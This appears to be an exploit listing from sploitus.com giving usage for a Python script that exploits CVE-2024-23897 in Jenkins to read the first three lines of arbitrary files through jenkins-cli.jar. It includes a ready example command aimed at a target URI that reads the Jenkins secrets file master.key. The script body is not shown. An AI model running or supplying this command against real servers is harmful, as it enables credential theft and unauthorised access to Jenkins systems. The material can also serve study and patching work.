## https://sploitus.com/exploit?id=8392022A-626F-5492-97E0-5CA30FC9E04C
Read first 3 lines of any file with read permission for current user on the system.
The script is using proxychains internally.
Usage:
`python CVE-2024-23897.py <jenkins-cli.jar path> <target URI> <file path>`
Example:
`python CVE-2024-23897.py /mnt/hgfs/Share/jenkins-cli.jar http://10.10.14.8:8080/ /var/lib/jenkins/secrets/master.key`